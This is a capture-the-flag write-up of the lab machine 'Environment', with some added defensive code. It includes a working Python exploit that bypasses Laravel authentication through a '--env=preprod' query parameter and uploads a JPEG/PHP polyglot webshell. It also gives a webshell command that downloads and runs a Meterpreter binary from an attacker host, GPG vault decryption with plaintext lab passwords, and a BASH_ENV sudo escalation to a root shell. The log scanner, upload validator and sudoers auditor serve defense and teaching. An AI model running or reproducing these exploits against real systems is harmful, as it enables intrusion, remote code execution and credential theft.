Syk0

Environment

Overview

Environment is a Laravel PHP application machine with two chained CVEs: an environment override (CVE-2024-52301) that bypasses authentication entirely by passing --env=preprod in the request URL, which Laravel's command-line environment detection honours, followed by a file upload MIME type bypass (CVE-2025-27515) that gives RCE. After the foothold, GPG private keys in a user's home directory decrypt a password vault. Privilege escalation uses BASH_ENV to make a sudoable bash command source our script before it runs.


Recon

Nmap

sudo nmap -sC -sV -vv -oA tcp 10.129.232.3 && sudo nmap -sC -sV -vv -p- -oA allports 10.129.232.3

The application runs on port 80 and responds as http://environment.htb/. Add to /etc/hosts.

Application Fingerprinting

Laravel is identified by its session cookies (laravel_session, XSRF-TOKEN):

Login Form Anomaly

Accessing a POST-only page via GET returns an error:

Modifying the remember parameter from true/false to any other value causes a different error during login form submission:


Foothold

CVE-2024-52301 - Authentication Bypass via --env

This vulnerability affects Laravel versions that read the --env argument from $_SERVER['argv'], which PHP fills from the request's query string when register_argc_argv is enabled, so a URL parameter is enough to pick the environment configuration. On this machine the preprod environment is configured to disable authentication.

Add --env=preprod to the login form's POST URL by editing the form action directly in the browser:

POST /login?--env=preprod

Reference: https://github.com/Nyamort/CVE-2024-52301
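To spot this bypass in web server logs, the following added example (mine, not from the writeup or the PoC repository) rebuilds $_SERVER['argv'] the way PHP does when register_argc_argv is on, i.e. the raw query string split on '+' with no URL decoding, and then applies the same --env scan Laravel performs, so both ?--env=preprod and the spaced form ?x+--env+preprod are caught while an ordinary env=preprod parameter is not. The log lines are constructed. On the PHP side the mitigation is register_argc_argv = Off for the web SAPI together with the patched Laravel release.

```python
import re
from typing import Optional

# Constructed sample lines in combined log format (not taken from the writeup).
SAMPLE_LOG = """\
10.10.14.5 - - [11/May/2025:10:01:02 +0000] "GET /login HTTP/1.1" 200 1832 "-" "Mozilla/5.0"
10.10.14.5 - - [11/May/2025:10:01:09 +0000] "POST /login?--env=preprod HTTP/1.1" 302 512 "-" "Mozilla/5.0"
10.10.14.5 - - [11/May/2025:10:01:30 +0000] "GET /upload?page=2+--env+local HTTP/1.1" 200 77 "-" "curl/8.4"
10.10.14.9 - - [11/May/2025:10:02:00 +0000] "GET /profile?env=preprod HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
"""

REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"'
)


def php_argv(query: str) -> list:
    """Rebuild $_SERVER['argv'] as PHP does with register_argc_argv=On:
    the raw query string split on '+', with no URL decoding of the pieces."""
    return query.split("+") if query else []


def env_override(argv: list) -> Optional[str]:
    """Mirror Laravel's argv scan: '--env=<name>' or '--env <name>' selects the environment."""
    for i, token in enumerate(argv):
        if token == "--env":
            return argv[i + 1] if i + 1 < len(argv) else None
        if token.startswith("--env="):
            return token.split("=", 1)[1]
    return None


def scan_log(text: str) -> list:
    """Return one finding per request whose query string carries an --env override."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = REQUEST_RE.match(line)
        if not m:
            continue
        _, _, query = m["target"].partition("?")
        env = env_override(php_argv(query))
        if env is not None:
            findings.append({"line": lineno, "ip": m["ip"], "method": m["method"],
                             "target": m["target"], "env": env})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"line {f['line']}: {f['ip']} {f['method']} {f['target']} -> environment override '{f['env']}'")
```

Any hit on a production host is worth an alert on its own: there is no legitimate reason for a browser to send argv-style options in a query string.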

Access is granted to the management dashboard, which exposes a mailing list and a profile avatar upload feature:

CVE-2025-27515 - File Upload Bypass (Webshell)

The same Laravel version is vulnerable to a file upload filter bypass: the upload endpoint validates the declared MIME type and the apparent extension, but a filename ending in .php. (trailing dot) passes the image check and is stored with the dot stripped, as a PHP file:

import re
import requests

BASE = "http://environment.htb"
session = requests.session()

# CSRF token extraction: Laravel embeds the session token in every form as a hidden _token field
token = re.search(r'name="_token" value="([^"]+)"', session.get(f"{BASE}/login").text).group(1)

# Authentication bypass (CVE-2024-52301): --env=preprod in the login URL. The credential
# field names (email/password/remember) are the stock Laravel ones, not shown in the writeup.
session.post(f"{BASE}/login?--env=preprod",
             data={"_token": token, "email": "x@x.x", "password": "x", "remember": "false"})

# JPEG header followed by a minimal PHP webshell; the trailing dot in the filename
# gets past the image check and the file lands on disk as syk02.jpg.php (CVE-2025-27515)
fc = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00<?php if(isset($_REQUEST['cmd'])) { system($_REQUEST['cmd']); } ?>"

files = {'upload': ('syk02.jpg.php.', fc, 'image/jpeg')}
data = {'_token': token}

re_upload = session.post(f"{BASE}/upload", data=data, files=files)
print(re_upload.status_code, re_upload.text[:200])

The webshell is accessible at:

http://environment.htb/storage/files/syk02.jpg.php
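A server-side check that would have stopped this upload, as an added example (mine, not the application's code): the client-supplied name must be one base name plus one allowlisted image extension with nothing after it, the content must start with the matching magic bytes and agree with the declared Content-Type, and the file is stored under a random name whose extension comes from the sniffed type rather than from the client. The payload constant is constructed to have the same shape as the writeup's (JPEG header followed by PHP).

```python
import re
import secrets

# Allowlisted image types, keyed by the extension we store, with their leading magic bytes
# and the Content-Type a browser declares for them (constructed allowlist).
ALLOWED = {
    "jpg": (b"\xff\xd8\xff", "image/jpeg"),
    "png": (b"\x89PNG\r\n\x1a\n", "image/png"),
    "gif": (b"GIF8", "image/gif"),
}

# One base name, one extension, nothing after it: "x.jpg.php." and "x.php" never match.
CLIENT_NAME_RE = re.compile(r"^[A-Za-z0-9_-]{1,64}\.(jpe?g|png|gif)$")

# Constructed polyglot with the same shape as the writeup's upload: JPEG header, then PHP.
SAMPLE_POLYGLOT = (b"\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
                   b"<?php system($_REQUEST['cmd']); ?>")


def sniff(data: bytes):
    """Return the allowlisted extension whose signature the content starts with, else None."""
    for ext, (magic, _) in ALLOWED.items():
        if data.startswith(magic):
            return ext
    return None


def validate_upload(client_name: str, declared_mime: str, data: bytes) -> dict:
    """Decide whether an avatar upload is stored and under what name.
    Returns {'stored_as': name} on success or {'rejected': reason}."""
    if not CLIENT_NAME_RE.fullmatch(client_name):
        return {"rejected": f"filename {client_name!r}: expected <name>.<image ext> with nothing after it"}
    ext = sniff(data)
    if ext is None:
        return {"rejected": "content does not start with an allowed image signature"}
    if declared_mime != ALLOWED[ext][1]:
        return {"rejected": f"declared {declared_mime} but content is {ALLOWED[ext][1]}"}
    # Defence in depth: a JPEG header followed by PHP passes a magic-byte check,
    # so refuse image bodies that carry PHP open tags at all.
    if b"<?php" in data or b"<?=" in data:
        return {"rejected": "image carries PHP open tags"}
    # The client name is never reused on disk; the stored extension comes from the sniffed type.
    return {"stored_as": f"{secrets.token_hex(8)}.{ext}"}


if __name__ == "__main__":
    cases = [
        ("syk02.jpg.php.", "image/jpeg", SAMPLE_POLYGLOT),          # the writeup's filename trick
        ("avatar.jpg", "image/jpeg", SAMPLE_POLYGLOT),              # clean name, polyglot body
        ("avatar.png", "image/png", b"\xff\xd8\xff\xe0" + b"\0" * 32),  # declared type disagrees with content
        ("avatar.jpg", "image/jpeg", b"\xff\xd8\xff\xe0" + b"\0" * 32),  # accepted, stored under a random name
    ]
    for name, mime, body in cases:
        print(name, mime, "->", validate_upload(name, mime, body))
```

The other half of the fix is where the file lands: uploads belong outside the document root, or in a directory where the PHP handler is disabled, so that even a polyglot that slips through is served as bytes rather than executed.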

Execute commands via the cmd parameter. Upload and execute a Meterpreter binary:

POST /storage/files/syk02.jpg.php HTTP/1.1
Host: environment.htb
...
 
cmd=curl http://10.10.15.150/e -o /tmp/e;chmod 0777 /tmp/e;/tmp/e%26

Meterpreter session received:


Lateral Movement

User Enumeration

A user hish exists on the system:

The database contains three user records:

Hashed passwords don't crack - move on.

GPG Private Key Decryption

Linpeas finds GPG keys in /home/hish/.gnupg/:

Download the entire GPG keystore and private keys:

/home/hish/.gnupg/private-keys-v1.d/C2DF4CF8B7B94F1EEC662473E275A0E483A95D24.key
/home/hish/.gnupg/private-keys-v1.d/3B966A35D4A711F02F64B80E464133B0F0DBCB04.key
/home/hish/.gnupg/trustdb.gpg
/home/hish/.gnupg/pubring.kbx

Recreate the .gnupg layout locally (a private-keys-v1.d/ directory holding the two .key files, alongside pubring.kbx and trustdb.gpg), point gpg at it with --homedir, confirm the key is visible, then decrypt the vault file:

gpg --homedir . --list-keys
gpg --homedir . --out keyvault --decrypt keyvault.gpg

Decrypted contents:

PAYPAL.COM -> Ihaves0meMon$yhere123
ENVIRONMENT.HTB -> marineSPm@ster!!
FACEBOOK.COM -> summerSunnyB3ACH!!

The ENVIRONMENT.HTB password belongs to hish.


Privilege Escalation

BASH_ENV - Sudo Injection

With hish's password, check sudo -l:

hish can run /usr/bin/systeminfo as root. The command is executed by bash, and BASH_ENV names a file that bash sources whenever it starts, including non-interactively. Because sudo preserves BASH_ENV for this command, whatever that file contains runs as root before systeminfo's own code executes.

Create t.sh (our Meterpreter binary launcher):

#!/bin/bash
 
/tmp/e &

Set BASH_ENV and trigger sudo:

BASH_ENV=/home/hish/t.sh sudo /usr/bin/systeminfo

When sudo executes bash to run systeminfo, bash sources t.sh first - running our Meterpreter binary as root.
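Whether sudo preserves BASH_ENV is decided in sudoers: with env_reset on (the default), the variable only survives if it appears in an env_keep list. The following added example (mine, not from the writeup) audits a sudoers file for that configuration and strips the offending names. The sudoers text is constructed, since the page shows sudo -l only as a screenshot, and hish's entry is rendered as an assumed line.

```python
import re

# Constructed sudoers content: hish's entry is an assumed rendering of what sudo -l showed,
# and the env_keep Defaults is the setting that lets BASH_ENV survive env_reset.
SAMPLE_SUDOERS = """\
Defaults        env_reset
Defaults        mail_badpass
Defaults        env_keep += "ENV BASH_ENV"
root    ALL=(ALL:ALL) ALL
hish    ALL=(ALL) /usr/bin/systeminfo
"""

# Variables that turn a preserved environment into code execution in the privileged shell.
# sudo's own defaults strip both; an env_keep entry re-adds them.
DANGEROUS = {
    "BASH_ENV": "bash sources this file on every non-interactive start, so it runs as root",
    "ENV": "sh/ksh (and bash in POSIX mode) source this file the same way",
}

ENV_KEEP_RE = re.compile(r'^(\s*Defaults\b[^\n]*?\benv_keep\s*(?:\+=|=)\s*)"?([^"\n]*)"?\s*$', re.M)
NO_RESET_RE = re.compile(r'^\s*Defaults\b[^\n]*!env_reset', re.M)


def audit_env_keep(sudoers: str) -> list:
    """Return (name, reason) pairs for every risky environment setting found."""
    findings = []
    for m in ENV_KEEP_RE.finditer(sudoers):
        for var in m.group(2).split():
            if var in DANGEROUS:
                findings.append((var, DANGEROUS[var]))
    if NO_RESET_RE.search(sudoers):
        findings.append(("env_reset", "disabled, so the caller's whole environment reaches the command"))
    return findings


def harden(sudoers: str) -> str:
    """Drop the dangerous names from every env_keep list; remove lines left empty."""
    out = []
    for line in sudoers.splitlines():
        m = ENV_KEEP_RE.match(line)
        if m:
            kept = [v for v in m.group(2).split() if v not in DANGEROUS]
            if not kept:
                continue
            line = f'{m.group(1)}"{" ".join(kept)}"'
        out.append(line)
    return "\n".join(out) + "\n"


if __name__ == "__main__":
    for name, reason in audit_env_keep(SAMPLE_SUDOERS):
        print(f"{name}: {reason}")
    print("--- hardened ---")
    print(harden(SAMPLE_SUDOERS), end="")
```

The same check belongs in a host audit: any env_keep that lists ENV or BASH_ENV, or a Defaults line with !env_reset, makes every sudoable shell script on that host a root shell for its allowed users.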


Attack Chain Summary

Phase            | Technique                          | Result
Recon            | Cookie fingerprinting              | Laravel application identified
Auth bypass      | CVE-2024-52301 --env=preprod       | Access to management dashboard
Foothold         | CVE-2025-27515 file upload bypass  | Webshell → Meterpreter
Lateral movement | GPG private key decryption         | hish:marineSPm@ster!!
Privesc          | BASH_ENV injection via sudo        | Root Meterpreter